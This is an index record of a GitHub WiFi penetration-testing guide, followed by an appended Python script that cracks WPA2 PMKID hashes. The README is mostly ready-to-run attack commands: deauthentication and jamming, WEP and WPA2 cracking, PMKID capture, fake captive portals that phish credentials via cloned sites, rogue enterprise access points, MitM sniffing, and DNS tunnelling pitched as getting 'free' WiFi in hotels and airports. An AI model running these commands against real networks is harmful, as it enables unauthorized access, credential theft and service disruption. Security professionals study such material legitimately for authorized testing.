{"id":13797320,"url":"https://github.com/ricardojoserf/wifi-pentesting-guide","last_synced_at":"2026-01-18T02:58:55.559Z","repository":{"id":54365500,"uuid":"179707852","full_name":"ricardojoserf/wifi-pentesting-guide","owner":"ricardojoserf","description":"WiFi Penetration Testing Guide","archived":false,"fork":false,"pushed_at":"2023-12-14T17:06:44.000Z","size":563,"stargazers_count":419,"open_issues_count":0,"forks_count":77,"subscribers_count":12,"default_branch":"master","last_synced_at":"2024-11-18T11:41:00.290Z","etag":null,"topics":["offensive-security","offensivesecurity","pentest-scripts","pentesting","pentesting-tools","wifi","wifi-hacking","wifi-network","wifi-security"],"latest_commit_sha":null,"homepage":"https://ricardojoserf.github.io/wifiguide/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/ricardojoserf.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2019-04-05T15:27:01.000Z","updated_at":"2024-11-13T09:17:58.000Z","dependencies_parsed_at":"2023-12-14T18:29:45.099Z","dependency_job_id":"88bf92b3-ccf8-46a5-aa32-25bf043aa2ea","html_url":"https://github.com/ricardojoserf/wifi-pentesting-guide","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ricardojoserf%2Fwifi-pentesting-guide","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ricardojoserf%2Fwifi-pentesting-guide/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ricardojose
rf%2Fwifi-pentesting-guide/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/ricardojoserf%2Fwifi-pentesting-guide/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/ricardojoserf","download_url":"https://codeload.github.com/ricardojoserf/wifi-pentesting-guide/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":253859783,"owners_count":21975175,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["offensive-security","offensivesecurity","pentest-scripts","pentesting","pentesting-tools","wifi","wifi-hacking","wifi-network","wifi-security"],"created_at":"2024-08-03T23:01:27.659Z","updated_at":"2026-01-18T02:58:55.512Z","avatar_url":"https://github.com/ricardojoserf.png","language":"Python","funding_links":[],"categories":["HarmonyOS","\u003ca id=\"8c5a692b5d26527ef346687e047c5c21\"\u003e\u003c/a\u003e收集"],"sub_categories":["Windows Manager"],"readme":"# WiFi Penetration Testing Guide\r\n\r\n## Index\r\n\r\n1. [Basic commands](#1)\r\n\r\n2. [Open networks](#2)\r\n\r\n\t2.1. [Captive portals](#21)\r\n\r\n\t2.2. [Man in the Middle attack](#22)\r\n\r\n3. [WEP cracking](#3)\r\n\r\n\t3.1. [No clients](#31)\r\n\r\n4. [WPA2-PSK cracking](#4)\r\n\r\n\t4.1. [Cracking the 4-way-handshake](#41)\r\n\t\r\n\t4.2. [PMKID attack](#42)\r\n\r\n\t4.3. [AP-less attack](#43)\r\n\r\n5. [WPA2-Enterprise](#5)\r\n\r\n\t5.1. [Fake Access Points](#51)\r\n\t\r\n\t5.2. [Brute force](#52)\r\n\t\r\n\t5.3. [EAP methods supported](#53)\r\n\r\n6. [Other attacks](#6)\r\n\r\n\t6.1. 
[Krack Attack and Frag Attack](#61)\r\n\r\n\t6.2. [OSINT](#62)\r\n\r\n\t6.3. [Wifi Jamming](#63)\r\n\r\n\t6.4. [Other frameworks](#64)\r\n\r\n7. [Post-exploitation](#7)\r\n\r\n\t7.1. [Attacking the router](#71)\r\n\t\r\n\t7.2. [Types of scanners](#72)\r\n\t\r\n\t7.3. [Spoofing](#73)\r\n\r\n-------------------------\r\n\r\n\u003cbr\u003e\r\n\r\n# \u003ca name=\"1\"\u003e\u003c/a\u003e1. Basic commands\r\n\r\n\r\n#### Set environment variable\r\n\r\n```bash\r\nVARIABLE=value\r\n```\r\n\r\n#### Check interface mode \r\n\r\n```bash\r\niwconfig $IFACE\r\n```\r\n\r\n#### Check interface status\r\n\r\n```bash\r\nifconfig $IFACE\r\n```\r\n\r\n#### Set monitor mode \r\n\r\n```\r\nairmon-ng check kill\r\nifconfig $IFACE down\r\niwconfig $IFACE mode monitor\r\nifconfig $IFACE up\r\n```\r\n\r\n\r\n#### List networks\r\n\r\n1. Set monitor mode\r\n\r\n2. Run Airodump-ng\r\n\r\n```bash\r\nairodump-ng $IFACE -c $CHANNEL -e $ESSID\r\n```\r\n\r\n\r\n#### Deauthentication\r\n\r\n`-0 N` sends N deauthentication bursts; N = 0 keeps sending until you stop it.\r\n\r\n1. Only one client\r\n\r\n```bash\r\n aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE\r\n```\r\n\r\n2. An Access Point (= all the clients of the AP, via broadcast deauthentication)\r\n\r\n```bash\r\n aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC $IFACE\r\n```\r\n\r\n#### Get hidden SSID with clients\r\n\r\n1. List networks\r\n\r\nList the networks using Airodump-ng and get the AP's MAC address ($AP_MAC) and one from a client ($CLIENT_MAC). Do not stop the capture.\r\n\r\n2. Deauthenticate\r\n\r\nIn another terminal, deauthenticate a client or all of them. When the client reconnects, its probe and association frames carry the network name, and Airodump-ng will show the ESSID in the first terminal:\r\n\r\n```bash\r\naireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE\r\n```\r\n\r\n#### Get hidden SSID without clients\r\n\r\n1. List networks\r\n\r\nList the networks using Airodump-ng and get the AP's MAC address ($AP_MAC) and its channel ($AP_CHANNEL). With no client to deauthenticate, the name has to be guessed by probing the AP. Do not stop the capture.\r\n\r\n2.a. 
Execute a dictionary attack\r\n\r\n```\r\nmdk3 $IFACE p -t $AP_MAC -f $DICTIONARY_PATH\r\n```\r\n\r\n2.b. Or execute a bruteforce attack\r\n\r\n```\r\nmdk3 $IFACE p -t $AP_MAC -c $AP_CHANNEL -b $CHARACTER_SET\r\n```\r\n\r\nFor the character set it is possible to use *l* (lowercase letters), *u* (uppercase letters), *n* (numbers), *c* (lowercase+uppercase), *m* (lowercase+uppercase+numbers) or *a* (all printable characters). Brute force only makes sense for short names: the search space grows exponentially with the SSID length.\r\n\r\n-------------------------\r\n\r\n\u003cbr\u003e\r\n\r\n# \u003ca name=\"2\"\u003e\u003c/a\u003e2. Open networks\r\n\r\n## \u003ca name=\"21\"\u003e\u003c/a\u003e2.1. Captive portals\r\n\r\n### 2.1.1. Fake captive portals\r\n\r\n\r\n1. Clone a website using [HTTrack](https://www.httrack.com/) \r\n\r\n2. Install [Wifiphisher](https://github.com/wifiphisher/wifiphisher). Add the HTTrack result in a new folder in *wifiphisher/data/phishing-pages/*new_page*/html* and a configuration file in *wifiphisher/data/phishing-pages/*new_page*/config.ini*. \r\n\r\n3. Reinstall the project using *python setup.py install* or use the binary in *bin*. \r\n\r\n4. This command works correctly in the latest Kali release after installing hostapd:\r\n\r\n```\r\ncd bin \u0026\u0026 ./wifiphisher -aI $IFACE -e $ESSID --force-hostapd -p $PLUGIN -nE\r\n```\r\n\r\n\u003cbr\u003e\r\n\r\n### 2.1.2. Bypass 1: MAC spoofing\r\n\r\nThe first method to bypass a captive portal is to change your MAC address to that of an already authenticated user. Most portals only whitelist the MAC (and sometimes the IP) of a client that has completed the login, so cloning both lets your traffic through.\r\n\r\n1. Scan the network and get the list of IP and MAC addresses. You can use:\r\n\r\n- nmap\r\n\r\n- A custom script like [this](scripts/open/get_mac_ip.sh) (Bash) or [this](scripts/open/get_mac_ip.py) (Python)\r\n\r\n2. Change your IP and MAC addresses. 
You can use:\r\n\r\n- macchanger\r\n\r\n- A custom script like [this](scripts/open/change_mac_ip.sh) (Bash)\r\n\r\n\r\nAlso, you can use scripts to automate the process like:\r\n\r\n- [Poliva script](https://raw.githubusercontent.com/poliva/random-scripts/master/wifi/hotspot-bypass.sh)\r\n\r\n- [Hack captive portals](https://github.com/systematicat/hack-captive-portals)\r\n\r\n\u003cbr\u003e\r\n\r\n### 2.1.3. Bypass 2: DNS tunnelling\r\n\r\nA second method is creating a DNS tunnel. Captive portals usually let unauthenticated clients resolve DNS names (they need it to redirect you to the login page), so any data that can be encoded in DNS queries gets out. For this, it is necessary to have an accessible DNS server of your own. You can use this method to bypass the captive portal and get \"free\" Wifi in hotels, airports...\r\n\r\n\r\n1. Check that domain names are resolved from behind the portal:\r\n\r\n```\r\nnslookup example.com\r\n```\r\n\r\n2. Create 2 DNS records (in [Digital ocean](https://www.digitalocean.com/), [Afraid.org](http://freedns.afraid.org/)...):\r\n\r\n- One \"A record\": dns.$DOMAIN pointing to the $SERVER_IP (Example: dns.domain.com 139.59.172.117)\r\n\r\n- One \"NS record\": hack.$DOMAIN pointing to dns.$DOMAIN (Example: hack.domain.com dns.domain.com), so that every query for *.hack.$DOMAIN is forwarded to your server\r\n\r\n\r\n3. Execution in the server (10.0.0.1 is the server's address inside the tunnel)\r\n\r\n```\r\niodined -f -c -P $PASS -n $SERVER_IP 10.0.0.1 hack.$DOMAIN\r\n```\r\n\r\n4. Check if it works correctly in [here](https://code.kryo.se/iodine/check-it/)\r\n\r\n\r\n5. Execution in the client ($DNS_SERVER_IP is the resolver the portal network hands out; it forwards the queries to your server)\r\n\r\n```\r\niodine -f -P $PASS $DNS_SERVER_IP hack.$DOMAIN\r\n```\r\n\r\n6. Create a SOCKS proxy through the tunnel and point the browser at localhost:8080\r\n\r\n```\r\nssh -D 8080 $USER@10.0.0.1\r\n```\r\n\r\n\u003cbr\u003e\r\n\r\n## \u003ca name=\"22\"\u003e\u003c/a\u003e2.2. Man in the Middle attack\r\n\r\nOnce you are in the network, you can test if it is vulnerable to Man in the Middle attacks (an open network has no link-layer encryption, so any client can see and spoof the traffic of the others).\r\n\r\n1. ARP Spoofing attack using [Ettercap](https://www.ettercap-project.org/)\r\n\r\n2. Sniff the traffic using Wireshark or TCPdump\r\n\r\n3. 
Analyze the traffic using [PCredz](https://github.com/lgandx/PCredz) (Linux) or [Network Miner](https://www.netresec.com/?page=networkminer) (Windows)\r\n\r\n-------------------------\r\n\r\n\u003cbr\u003e\r\n\r\n# \u003ca name=\"3\"\u003e\u003c/a\u003e3. WEP cracking\r\n\r\n1. Start capture (airodump-ng appends -01.cap to the prefix given with -w, so the file will be $PCAP_FILE-01.cap)\r\n```bash\r\nairodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE\r\n```\r\n\r\n\r\n2. Accelerate the IV capture using *Fake authentication* + *ARP Request Replay Attack* + *Deauthenticate user*. Stop Airodump at ~100,000 different IVs (the #Data column)\r\n\r\n```bash\r\naireplay-ng -1 0 -e $AP_NAME -a $AP_MAC -h $MY_MAC $IFACE\r\naireplay-ng -3 -b $AP_MAC -h $MY_MAC $IFACE\r\naireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE\r\n```\r\n\r\n3. Crack the key using Aircrack-ng (WEP falls to a statistical attack on the IVs, no wordlist needed)\r\n```bash\r\naircrack-ng $PCAP_FILE-01.cap\r\n```\r\n\r\n\r\n-------------------------\r\n\r\n\r\n\u003cbr\u003e\r\n\r\n# \u003ca name=\"4\"\u003e\u003c/a\u003e4. WPA2-PSK cracking\r\n\r\n## \u003ca name=\"41\"\u003e\u003c/a\u003e4.1. Cracking the 4-way-handshake\r\n\r\n1. Start capture\r\n\r\n```bash\r\nairodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE\r\n```\r\n\r\n2. Deauthenticate a user. Stop the airodump capture when you see the message 'WPA handshake: $MAC' in the top right corner\r\n\r\n```bash\r\naireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE\r\n```\r\n\r\n3. Option 1: Crack the handshake using Aircrack-ng\r\n\r\n```bash\r\naircrack-ng -w $WORDLIST $PCAP_FILE-01.cap\r\n```\r\n\r\nYou can get wordlists from [here](https://github.com/kennyn510/wpa2-wordlists).\r\n\r\n4. Option 2: Crack the handshake using Pyrit (no longer maintained and Python 2 only; hashcat -m 22000 is the current alternative)\r\n\r\n```\r\npyrit -r $PCAP_FILE analyze\r\npyrit -r $PCAP_FILE -o $CLEAN_PCAP_FILE strip\r\npyrit -i $WORDLIST import_passwords\r\npyrit eval\r\npyrit batch\r\npyrit -r $CLEAN_PCAP_FILE attack_db\r\n```\r\n\r\n\u003cbr\u003e\r\n\r\n## \u003ca name=\"42\"\u003e\u003c/a\u003e4.2. PMKID attack\r\n\r\nYou can use [this script](scripts/wpa/pmkid.sh) or follow these steps:\r\n\r\n1. 
Install hcxdumptool and hcxtools (you can use this [script](scripts/wpa/pmkid_install.sh)). The flags and tools below are those of the hcxdumptool/hcxtools releases this guide was written against; recent releases changed the command line, replaced hcxpcaptool with hcxpcapngtool and write the hashcat 22000 format instead of 16800.\r\n\r\n2. Stop Network Manager\r\n\r\n```bash\r\nairmon-ng check kill\r\n```\r\n\r\n\r\n\r\n3a. If you want to attack a specific MAC address\r\n\r\n- Create a text file ($FILTER_FILE) and add the MAC address without \":\". You can use *sed* and redirect the output to a file:\r\n\r\n```\r\necho $MAC | sed 's/://g' \u003e $FILTER_FILE\r\n```\r\n\r\n- Capture PMKID. No client is needed: hcxdumptool associates with the AP itself and the PMKID arrives in the first EAPOL message. Only APs that include a PMKID there are affected; otherwise fall back to the 4-way handshake of [4.1](#41)\r\n\r\n```bash\r\nhcxdumptool -i $IFACE -o $PCAPNG_FILE --enable_status=1 --filterlist=$FILTER_FILE --filtermode=2\r\n```\r\n\r\n4. Create $HASH_FILE \r\n\r\n```bash\r\nhcxpcaptool -z $HASH_FILE $PCAPNG_FILE\r\n```\r\n \r\nThe structure of each line is: PMKID * ROUTER MAC * STATION MAC * ESSID, all in hex. Decode the ESSID with `xxd -r -p` or at https://www.rapidtables.com/convert/number/hex-to-ascii.html \r\n\r\n5. Crack it using Hashcat (mode 16800). For each candidate hashcat computes PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 rounds) and compares HMAC-SHA1(PMK, \"PMK Name\" || AP MAC || STATION MAC) with the captured PMKID\r\n\r\n```bash\r\nhashcat -a 0 -m 16800 $HASH_FILE $WORDLIST --force\r\n```\r\n\r\n\u003cbr\u003e\r\n\r\n## \u003ca name=\"43\"\u003e\u003c/a\u003e4.3. AP-less attack\r\n\r\nIf you have access to a client device with the Wifi connection turned on but the network is not around, you can still attack that network if the client device has previously connected to it. \r\n\r\nFor that, you have to create a Fake Access Point using hostapd with a configuration file like [this one](https://gist.github.com/nickpegg/059ad1e0a0a14671892e), with any password but the same network name. Create the fake network, the client device will try to connect to it and you get the 4-way handshake as in the [4.1 section in this guide](#41). Only messages 1 and 2 are needed: the client computes the MIC of message 2 with the real PSK, so the capture is crackable even though the fake AP never completes the handshake.\r\n\r\n\r\n-------------------------\r\n\r\n\u003cbr\u003e\r\n\r\n# 5. 
\u003ca name=\"5\"\u003e\u003c/a\u003e WPA2-Enterprise\r\n\r\n## 5.1 \u003ca name=\"51\"\u003e\u003c/a\u003eFake Access Points\r\n\r\n### Virtual machines download\r\n\r\n| Operating system | Platform | Credentials | Size | Link |\r\n| ---------------- | -------- | ----------- | ---- | ---- |\r\n| Ubuntu 16.04.5   | VMware   | ricardojoserf:wifi | 3.25 GB | [MEGA](https://mega.nz/file/5glEzKKa#SCmh95KdM28uPt-h8J5xtu4pQrnn_3yrI2kLnaSq3nw) |\r\n| Kali 2019.1      | VMware   | root:wifi          | 4.99 GB | [MEGA](https://mega.nz/file/11sDVSoB#KMq5yWvuGUFwGhqzd-5hE21Xsfxsp0UMauQKntMbs38) |\r\n| Ubuntu 16.04.5   | VirtualBox (OVA) | ricardojoserf:wifi | 3.18 GB | [MEGA](https://mega.nz/file/N5slGZLC#Dx1rBEMoNOAqdaEpB7BHhRi26HDxkJlyoQNk0frWDkw) |\r\n| Kali 2019.1      | VirtualBox (OVA) | root:wifi        | 5.56 GB | [MEGA](https://mega.nz/file/pl0j3ZwC#zE_skdeUCLoOSQHvtHrvejmA4Ktn9Qk0Sk0qI1d4KeI) |\r\n\r\n### Local installation\r\n\r\nIn case you do not want to use the virtual machine, you can install everything using:\r\n\r\n```\r\ngit clone https://github.com/ricardojoserf/WPA_Enterprise_Attack\r\n\r\ncd WPA_Enterprise_Attack \u0026\u0026 sudo sh install.sh\r\n```\r\n\r\n### Hostapd \u0026 Freeradius-wpe\r\n\r\nStart the Access Point using:\r\n\r\n```\r\nsh freeradius_wpe_init.sh $AP_NAME $INTERFACE\r\n```\r\n\r\nWhen a client connects, read logs with:\r\n\r\n```\r\nsh freeradius_wpe_read.sh\r\n```\r\n\r\n### Hostapd-wpe\r\n\r\n```\r\nsh hostapd_wpe_init.sh $AP_NAME $INTERFACE\r\n```\r\n\r\n\r\n\r\n## 5.2 \u003ca name=\"52\"\u003e\u003c/a\u003eBrute force\r\n\r\n- [Airhammer](https://github.com/Wh1t3Rh1n0/air-hammer)\r\n\r\n## 5.3 \u003ca name=\"53\"\u003e\u003c/a\u003eEAP methods supported\r\n\r\nFind supported EAP methods\r\n\r\n- [EAP_buster](https://github.com/blackarrowsec/EAP_buster)\r\n\r\n-------------------------\r\n\r\n\u003cbr\u003e\r\n\r\n# \u003ca name=\"6\"\u003e\u003c/a\u003e6. Other attacks\r\n\r\n\r\n## \u003ca name=\"61\"\u003e\u003c/a\u003e6.1. 
Krack Attack and Frag Attack\r\n\r\nThese are two advanced attacks discovered by the great [Mathy Vanhoef](https://twitter.com/vanhoefm): KRACK (2017) forces nonce reuse by replaying message 3 of the 4-way handshake, and the FragAttacks (2021) abuse frame fragmentation and aggregation flaws in the 802.11 standard and in many implementations:\r\n\r\n- [Krack Attack Scripts](https://github.com/vanhoefm/krackattacks-scripts) - Explained in [this website](https://www.krackattacks.com/)\r\n\r\n- [Frag Attack Scripts](https://github.com/vanhoefm/fragattacks) - Explained in [this website](https://www.fragattacks.com/)\r\n\r\n\r\n## \u003ca name=\"62\"\u003e\u003c/a\u003e6.2. OSINT\r\n\r\n- [Wigle](https://wigle.net/) - Wardriving database: look up an SSID or BSSID to find where it has been seen\r\n\r\n\r\n\r\n## \u003ca name=\"63\"\u003e\u003c/a\u003e6.3. Wifi Jamming\r\n\r\n- [Wifijammer](https://github.com/DanMcInerney/wifijammer) - This program can send deauthentication packets to both APs and clients. \r\n\r\nAn example to deauthenticate all the devices except a Fake Access Point (so that clients fall back to it):\r\n\r\n```\r\nsudo ./wifijammer -i $IFACE -s $FAKE_AP_MAC\r\n```\r\n\r\n## \u003ca name=\"64\"\u003e\u003c/a\u003e6.4. Other frameworks\r\n\r\nLinux:\r\n- [Sniffair](https://github.com/Tylous/SniffAir)\r\n- [Wifi Pumpkin](https://github.com/P0cL4bs/wifipumpkin3) - Framework for Rogue WiFi Access Point Attack\r\n- [Eaphammer](https://github.com/s0lst1c3/eaphammer) - Framework for Fake Access Points\r\n- [WEF](https://github.com/D3Ext/WEF) - Framework for different types of attacks for WPA/WPA2 and WEP, automated hash cracking and more\r\n\r\nWindows:\r\n- [Acrylic](https://www.acrylicwifi.com) - Useful for recon phase\r\n- [Ekahau](https://www.ekahau.com/) - Useful for Wi-Fi planning\r\n- [Vistumbler](https://www.vistumbler.net/) - Useful for wardriving\r\n\r\n\r\n\r\n\r\n-------------------------\r\n\r\n\u003cbr\u003e\r\n\r\n# \u003ca name=\"7\"\u003e\u003c/a\u003e7. Post-exploitation\r\n\r\nOnce you are connected to the network:\r\n\r\n## \u003ca name=\"71\"\u003e\u003c/a\u003e7.1. 
Attacking the router\r\n\r\n- [Routersploit](https://github.com/threat9/routersploit) - Exploitation Framework for Embedded Devices - Test \"use scanners/autopwn\"\r\n\r\n## \u003ca name=\"72\"\u003e\u003c/a\u003e7.2. Types of scanners\r\n\r\n- Nmap/Zenmap - Security Scanner, Port Scanner, \u0026 Network Exploration Tool\r\n\r\n- Masscan - A much faster port scanner than nmap (its packet rate can break embedded devices, so be careful)\r\n\r\n- Netdiscover - ARP sniffing. Very useful if the networks are very well segmented\r\n\r\n## \u003ca name=\"73\"\u003e\u003c/a\u003e7.3. Spoofing\r\n\r\n- Ettercap - Check if you can do a MitM attack and sniff all the traffic in the network\r\n\r\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fricardojoserf%2Fwifi-pentesting-guide","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fricardojoserf%2Fwifi-pentesting-guide","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fricardojoserf%2Fwifi-pentesting-guide/lists"}
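The PMKID step of section 4.2 above, as an added worked example that is not part of the original guide or its scripts: a small Python script (the language the repository's own scripts use) that parses a hashcat 16800 line, decodes the hex ESSID the guide sends you to a converter for, and performs the PBKDF2/HMAC computation hashcat runs for every wordlist candidate. The MAC addresses, ESSID, passphrase and wordlist are constructed for the example; the hash line is generated by the script itself, not taken from a real capture.

```python
#!/usr/bin/env python3
"""What `hashcat -m 16800` does, spelled out: derive the PMK from a candidate
passphrase, compute the PMKID and compare it with the captured one."""
import hashlib
import hmac
from typing import Iterable, Optional, Tuple


def pmk_from_passphrase(passphrase: str, essid: str) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes).
    This is the slow step and the reason wordlist attacks are the practical option."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               essid.encode("utf-8"), 4096, 32)


def pmkid_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP MAC || STA MAC): the first 16
    bytes of the HMAC. The AP puts this value in EAPOL message 1, so no client
    and no full handshake are needed to obtain it."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def parse_16800(line: str) -> Tuple[bytes, bytes, bytes, str]:
    """Split one 'PMKID*APMAC*STAMAC*ESSIDHEX' line (hcxpcaptool -z output) into
    bytes and decode the hex-encoded ESSID to text."""
    pmkid_hex, ap_hex, sta_hex, essid_hex = line.strip().split("*")
    essid = bytes.fromhex(essid_hex).decode("utf-8", errors="replace")
    return bytes.fromhex(pmkid_hex), bytes.fromhex(ap_hex), bytes.fromhex(sta_hex), essid


def format_16800(pmkid: bytes, ap_mac: bytes, sta_mac: bytes, essid: str) -> str:
    """Inverse of parse_16800; used here only to build the constructed sample line."""
    return "*".join([pmkid.hex(), ap_mac.hex(), sta_mac.hex(),
                     essid.encode("utf-8").hex()])


def crack_16800(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Try every candidate against one 16800 line; return the passphrase or None."""
    target, ap_mac, sta_mac, essid = parse_16800(line)
    for candidate in wordlist:
        candidate = candidate.rstrip("\r\n")
        # WPA2 passphrases are 8..63 bytes; skip anything else instead of wasting a PBKDF2
        if not 8 <= len(candidate.encode("utf-8")) <= 63:
            continue
        pmk = pmk_from_passphrase(candidate, essid)
        if hmac.compare_digest(pmkid_from_pmk(pmk, ap_mac, sta_mac), target):
            return candidate
    return None


# Constructed sample: hypothetical MACs, ESSID, passphrase and wordlist, not a real capture.
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ESSID = "TestNet"
SAMPLE_LINE = format_16800(
    pmkid_from_pmk(pmk_from_passphrase("correcthorse", ESSID), AP_MAC, STA_MAC),
    AP_MAC, STA_MAC, ESSID)
WORDLIST = ["password", "12345678", "short", "correcthorse", "batterystaple"]

if __name__ == "__main__":
    print("hash line:", SAMPLE_LINE)
    print("ESSID:", parse_16800(SAMPLE_LINE)[3])
    print("cracked:", crack_16800(SAMPLE_LINE, WORDLIST))
```

This is deliberately the naive single-threaded version: the 4096 PBKDF2 rounds per candidate are exactly the cost hashcat parallelises on the GPU, and the comparison is the same. With current hcxtools output (22000 format, `WPA*01*PMKID*APMAC*STAMAC*ESSIDHEX***` for PMKID entries) only the field split in `parse_16800` changes; the arithmetic is identical.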